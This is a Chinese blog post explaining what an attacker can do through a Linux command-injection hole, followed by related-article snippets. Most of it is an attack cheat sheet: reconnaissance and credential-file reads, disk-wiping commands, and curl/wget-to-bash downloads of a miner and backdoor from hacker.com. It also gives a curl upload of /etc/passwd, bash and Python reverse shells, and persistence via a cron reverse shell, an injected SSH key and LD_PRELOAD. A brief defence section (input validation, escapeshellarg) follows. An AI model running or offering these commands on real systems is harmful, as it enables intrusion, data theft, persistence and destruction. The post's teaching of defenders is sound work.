Linux命令执行潜在危害及常见攻击操作

原创 于 2025-05-28 20:43:37 发布 · 172 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

Linux命令执行潜在危害及常见攻击操作

当存在命令注入漏洞时,攻击者可以执行各种Linux命令进行恶意操作,危害程度从信息收集到完全控制系统不等。以下是常见的攻击操作分类:

一、信息收集类命令

1. 系统信息探测

uname -a           # 查看系统内核信息
cat /etc/issue     # 查看系统版本
hostname           # 查看主机名
whoami             # 查看当前用户

2. 文件系统探查

ls -al /           # 查看根目录文件
cat /etc/passwd    # 查看用户账户信息
cat /etc/shadow    # 查看密码哈希(需root)
find / -name *.php # 查找特定类型文件

3. 网络信息收集

ifconfig           # 查看网络配置
netstat -tulnp     # 查看开放端口和服务
arp -a             # 查看ARP缓存
route -n           # 查看路由表

二、权限提升操作

1. 敏感文件读取

cat ~/.bash_history # 查看命令历史
cat ~/.ssh/id_rsa   # 读取SSH私钥
sudo -l             # 检查sudo权限

2. 密码相关操作

cat /etc/shadow     # 获取密码哈希
john /etc/shadow    # 密码破解(需工具)
strings /usr/bin/sudo # 提取二进制文件中的字符串

三、破坏性操作

1. 文件系统操作

rm -rf /            # 删除所有文件(极端危险)
dd if=/dev/zero of=/dev/sda # 磁盘清零
mv /home /dev/null  # 移动目录到黑洞

2. 系统破坏

reboot              # 立即重启系统
halt                # 立即关机
echo 1 > /proc/sys/kernel/panic # 触发内核恐慌

3. 挖矿与后门

curl http://xmr.pool/rig | bash # 下载执行挖矿脚本
wget http://hacker.com/backdoor.sh -O- | sh # 下载执行后门

四、网络攻击操作

1. 内网扫描

nmap 192.168.1.0/24 # 扫描内网主机
for i in {1..254}; do ping -c 1 192.168.1.$i; done # ping扫描

2. 数据外泄

tar zcf /tmp/stolen.tar.gz /var/www # 打包网站数据
nc -lvp 4444 < /etc/passwd          # 通过netcat传输文件
curl http://hacker.com/upload.php -F "file=@/etc/passwd" # HTTP上传

3. 反向Shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1  # 创建反向shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

五、隐蔽持久化操作

1. 定时任务

(crontab -l ; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'") | crontab - # 添加恶意计划任务

2. SSH后门

echo 'ssh-rsa AAAAB3Nza... hacker@key' >> ~/.ssh/authorized_keys # 添加SSH公钥

3. 环境变量注入

echo 'export LD_PRELOAD=/tmp/malicious.so' >> ~/.bashrc # 预加载恶意库

防御建议

  1. 输入验证:严格过滤所有用户输入

    if(!filter_var($ip, FILTER_VALIDATE_IP)) {
    die("Invalid IP address");
}

  2. 命令转义:使用专用函数处理命令参数

    $safe_input = escapeshellarg($user_input);

  3. 最小权限原则:Web服务器使用低权限用户运行

  4. 禁用危险函数:在php.ini中禁用system, exec, shell_exec等函数

  5. 日志监控:记录所有敏感操作和命令执行

这些命令展示了为什么命令注入漏洞如此危险 - 一旦被利用,攻击者几乎可以完全控制系统。开发者必须严格防范此类漏洞。

meng_ser
关注
网络攻防中黑客常用的命令注入、代码注入、漏洞利用、命令执行漏洞等攻击手法使用与分析及修复方案
代码讲故事
04-07 255
网络攻防中黑客常用的命令注入、代码注入、漏洞利用、命令执行漏洞等攻击手法使用与分析及修复方案。
深入解析 XXE 攻击:原理、危害、检测与防范
candy的博客
01-03 403
在当今数字化时代,网络安全已成为各行业发展中不可忽视的关键因素。随着 Web 应用程序的广泛应用和复杂性的不断增加,各种安全漏洞也逐渐浮出水面,其中 XML 外部实体(XXE)攻击作为一种较为隐蔽且危害严重的漏洞类型,给企业和用户带来了巨大的潜在风险。深入了解 XXE 攻击的原理、危害、检测方法以及防范措施,对于保障网络安全具有至关重要的意义。
黑客大神都会玩这 10 个 Linux 命令,我不允许你还不知道!_linux 黑客命令
2401_84215240的博客
12-19 891
Linux当中有很多比较有趣的命令,可以动手看看,很简单的。1.rev命令一行接一行地颠倒所输入的字符串。运行:$rev如输入:shiyanloushiyanlou2.asciiview命令1.先安装aview$sudo apt-get install aview2.再安装imagemagick$sudo apt-get install imagemagick3.使用asciiview$asciiview shiyanlou.png -driver curses效果如下:===3.sl命令你会看到一辆火车从
命令执行漏洞
supermeatboy223的博客
03-01 7942
命令执行定义 基本定义 命令执行漏洞是指攻击者可以随意执行系统命令,分为远程命令执行(远程代码执行)和系统命令执行两类。 原理 程序应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec.passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击命令执行条件 两个条件 1.用户能够控制的函数输入 2.存在可以执行代码或者系统命令的危险函数 命令执行漏洞产生的原因..
Linux下防止注入攻击,应该过滤哪些字符?
sinat_33461431的博客
03-13 1512
重定向符号(>、>>、
Kali Linux漏洞注入实战指南
2301_77002907的博客
11-07 764
使用-p,我们告诉SQLMap,我们希望在用户名参数中查找sQLi,一旦漏洞被利用,我们希望它检索当前数据库用户名和数据库名称,并知道该用户在数据库中是否具有管理权限。4.一旦SQLMap 检测到应用程序使用的 DBMS,它还会询问我们是否要跳过对其他DBMS 的测试,是否要包含对所检测的特定系统的所有测试,即使它们超出了当前级别和配置风险的范围。可以发现应用给出了id为1的结果。结果显示了id为1的用户信息,这说明前面测试的1'是web应用已经预料到的错误,这里很可能会有sql盲注漏洞,我们来继续猜测。
命令注入实操与总结
qq_51582652的博客
03-24 3192
这个内容是为了了解命令注入攻击的过程,掌握思路。记一次DVWA靶场的通关,commix-testbed靶场的实验。
【web安全】远程命令执行(RCE)漏洞深度解析与攻防实践
最新发布
KP_0x01的博客
04-18 1250
RCE漏洞是指攻击者能够通过Web应用程序在远程服务器上执行任意操作系统命令的安全缺陷。这类漏洞通常源于应用程序将用户可控的输入直接拼接到系统命令中执行,且缺乏足够的过滤和验证。RCE漏洞因其直接导致系统沦陷的高危害性,始终位居Web安全威胁榜首。防御RCE需要开发人员和安全团队共同努力,从安全编码、输入验证、系统加固等多层面构建防护体系。随着攻击技术的不断演进,防御策略也需要持续更新,建议定期进行安全审计和渗透测试,确保系统防护有效性。
web常见漏洞——命令注入
2301_78300030的博客
07-04 993
1. 某网站的 Ping 命令执行页面:服务器使用的是 Windows Server 系统,在文本框中输入 8.8.8.8&&net user ,利用 && 符号连接了 ping 8.8.8.8 和 net user 两个命令,成功注入并获取到 net user 命令的执行结果,显示了系统用户信息。这个示例中,我们使用`Runtime.exec()`方法执行了一个`ping`命令,然后通过`BufferedReader`读取命令执行结果的输入流,并将结果输出到控制台。// 获取命令执行结果的输入流。
Linux操作系统加固
悦分享
07-23 1839
如何尽可能地加强Linux的安全性和隐私性?以下列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。
命令执行漏洞及防御
weixin_53386866的博客
02-28 1336
命令执行漏洞及防御 一、命令执行定义 1.命令执行与代码执行 命令执行:调用一些函数执行系统命令,将系统命令拼接到用户的输入中。最终导致命令执行, 导致了命令执行。形成命令执行漏洞。 代码执行:如我们上传的一-句话木马,执行后可使用菜刀连接。导致了代码执行 2.命令执行原理 程序应用有时候需要调用一些执行系统命令的函数,如: php的system. exec. shell exec. passthru. popen. proc popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令 拼接到正常命
命令注入总结
weixin_44576725的博客
12-15 7613
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用绕过命令分隔与执行多条命令空格绕过绕过 escapeshellcmd黑名单绕过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
渗透测试-命令执行注入
lza20001103的博客
07-20 4103
渗透测试-命令执行注入
什么是命令注入,命令注入如何避免?
热门推荐
llzhang_fly的博客
08-13 1万+
1、什么是命令注入 Command Injection,即命令注入攻击,是指由于嵌入式应用程序或者 web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。 在命令注入的漏洞中,最为常见的是PHP的命令注入。PHP命令注入攻击存在的主要原因是Web应用程序员在应用PHP语言中一些具有命令执行功能的函数时,对用户提交的数据内容没有进行严格的过滤就带入函...
Linux CC攻击脚本
lvwuwei的博客
05-02 4410
Linux CC攻击脚本 CC(ChallengeCollapsar)主要是用来攻击页面的。大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,访问的人越多,论坛的页面越多,数据库就越大,被访问的频率也越高,占用的系统资源也就相当可观。 最近在做一些防CC的措施,想验证效果就的有类似CC的攻击,所以写了个Python脚本来模拟CC攻击,其原理很简单,就...
使用LINUX系统DDOS攻击WINDOWS服务器
rubilly的专栏
10-09 1976
使用当下最有名的REDHAT LINUX进 行测试,本次攻击测试我使用的是FEDORA CORE3 ,软件用的是最有名的DDOS攻击工具 TFN2K LINUX版,被攻击的WINDOWS服务器系统使用的是WINDOWS2000 SERVER 服务开有APACHE2 FTP VNC关系不大,主要攻击APACHE 0.解压 tar -zxvf tfn2k.tgz 1.安装TFN2K TFN2K为开放原
最详细的SQL注入相关的命令整理
古剑楠的专栏
09-23 1060
最详细的SQL注入相关的命令整理 (转)   [ 日期: 2006-09-17 12:32 | 作者: d99 | 来自: 转 | | ]   1、   用^转义字符来写ASP(一句话木马)文件的方法:?   http://192.168.1
xig,Linux恶意攻击脚本进程之一
Luxuff的博客
10-20 5421
 首先说明一点,当你在搜索"xig"的时候,我可以肯定你的服务器已经被恶意攻击了, 原因很简单:绝大部分都是因为服务器连接密码设置过于简单。 回去改个密码再删删文件什么的基本就解决了,这种小白挖矿程序一般都只是占用服务器资源挖挖矿什么的,其他危害倒不严重。   由于之前我搜索“xig”的时候没遇到什么有针对性的文章,估计是已经很少有人犯这种错误了,但想想还是把细节写出来,引以为戒吧。  ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值